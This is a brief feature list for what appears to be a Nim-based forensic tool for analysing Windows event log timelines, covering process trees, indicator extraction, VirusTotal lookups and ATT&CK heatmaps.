Skip to content

Features

  • Written in Nim so it is very easy to program, memory safe, as fast as native C code and works as a single standalone binary on any OS.
  • Print the process trees of a malicious processes.
  • Split up CSV and JSONL timelines.
  • Extracting IP addresses, domains, hashes etc... to be used with VirusTotal lookups
  • VirusTotal lookups of domains, hashes and IP addresses.
  • List up .evtx files that cannot be detected yet.
  • Visualize TTPs with heatmaps in MITRE ATT&CK Navigator.
  • Stacking command lines, DNS requests, logons, processes, services, tasks, etc...
  • Timelines for logons, USB usage, suspicious processes, tasks, etc...
  • HTML summary reports
  • Many more!